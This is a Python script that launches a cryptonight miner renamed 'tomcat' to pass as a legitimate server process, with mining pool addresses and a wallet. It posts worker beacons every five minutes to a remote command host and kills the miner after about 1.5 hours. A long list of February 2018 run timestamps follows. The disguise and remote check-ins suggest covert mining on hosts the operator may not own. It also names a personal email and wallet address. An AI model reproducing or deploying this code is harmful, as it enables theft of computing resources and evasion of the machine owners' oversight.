import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:06.901132
#2018-02-17 16:35:07.214375
#2018-02-17 18:23:01.595161
#2018-02-17 20:11:07.279978
#2018-02-17 21:58:07.020578
#2018-02-17 23:44:04.716644
#2018-02-18 01:34:07.325771
#2018-02-18 03:21:01.871366
#2018-02-18 05:09:05.404312
#2018-02-18 07:01:01.981195
#2018-02-18 08:48:03.686130
#2018-02-18 10:35:05.381568
#2018-02-18 12:20:07.114947
#2018-02-18 14:07:06.949724
#2018-02-18 15:57:07.469734
#2018-02-18 17:49:05.963723
#2018-02-18 19:36:03.927519
#2018-02-18 21:21:04.724227
#2018-02-18 23:09:03.974808
#2018-02-19 00:56:01.993690
#2018-02-19 02:43:05.761016
#2018-02-19 04:30:10.088937
#2018-02-19 06:18:01.424491
#2018-02-19 08:06:05.010729
#2018-02-19 09:56:05.426166
#2018-02-19 11:46:13.868356
#2018-02-19 13:32:01.457009
#2018-02-19 15:20:06.796604
#2018-02-19 17:08:08.812722
#2018-02-19 18:54:09.556710
#2018-02-19 20:42:05.751783
#2018-02-19 22:29:05.665256
#2018-02-20 00:15:06.365043
#2018-02-20 02:03:04.102816
#2018-02-20 03:52:08.594778
#2018-02-20 05:38:01.747150
#2018-02-20 07:23:03.760968
#2018-02-20 09:08:05.369060
#2018-02-20 10:51:05.410250
#2018-02-20 12:38:04.972078
#2018-02-20 14:23:01.694365
#2018-02-20 16:09:05.887636
#2018-02-20 17:53:08.104171
#2018-02-20 19:43:08.359800
#2018-02-20 21:31:07.636675
#2018-02-20 23:15:08.481465
#2018-02-21 01:00:09.265136
#2018-02-21 02:46:07.423562
#2018-02-21 04:31:06.409610
#2018-02-21 06:18:02.021065
#2018-02-21 08:04:01.468416
#2018-02-21 09:49:08.588771
#2018-02-21 11:37:07.998309
#2018-02-21 13:26:08.231142
#2018-02-21 15:12:08.423684
#2018-02-21 17:02:06.460094
#2018-02-21 18:51:09.087685
#2018-02-21 20:39:08.189613
#2018-02-21 22:24:08.268553
#2018-02-22 00:14:04.388941
#2018-02-22 02:02:01.354329
#2018-02-22 03:47:06.438568
#2018-02-22 05:34:04.698990
#2018-02-22 07:18:07.193942
#2018-02-22 09:07:07.134665
#2018-02-22 10:55:05.816479
#2018-02-22 12:41:01.392130
#2018-02-22 14:28:08.233336
#2018-02-22 16:14:07.987051
#2018-02-22 17:59:07.119472
#2018-02-22 19:48:01.860924
#2018-02-22 21:37:05.955069
#2018-02-22 23:24:08.907133
#2018-02-23 01:11:07.176734
#2018-02-23 02:59:01.699978
#2018-02-23 04:47:05.445973
#2018-02-23 06:34:06.974102
#2018-02-23 08:22:07.850056
#2018-02-23 10:38:08.725754
#2018-02-23 12:33:09.182095
#2018-02-23 14:19:01.840919
#2018-02-23 16:10:11.062364
#2018-02-23 17:56:06.865230
#2018-02-23 19:41:03.785259
#2018-02-23 21:24:06.733799
#2018-02-23 23:12:07.684896
#2018-02-24 01:02:06.810855
#2018-02-24 02:54:07.159944
#2018-02-24 04:42:01.323816
#2018-02-24 06:26:03.524308
#2018-02-24 08:14:06.002457
#2018-02-24 09:58:03.215524
#2018-02-24 11:53:04.581585
#2018-02-24 13:43:05.561917
#2018-02-24 15:32:06.807918
#2018-02-24 17:26:07.489929
#2018-02-24 19:13:07.118451
#2018-02-24 21:01:01.529028
#2018-02-24 23:33:05.094469
#2018-02-25 03:35:09.037630
#2018-02-25 07:13:05.684881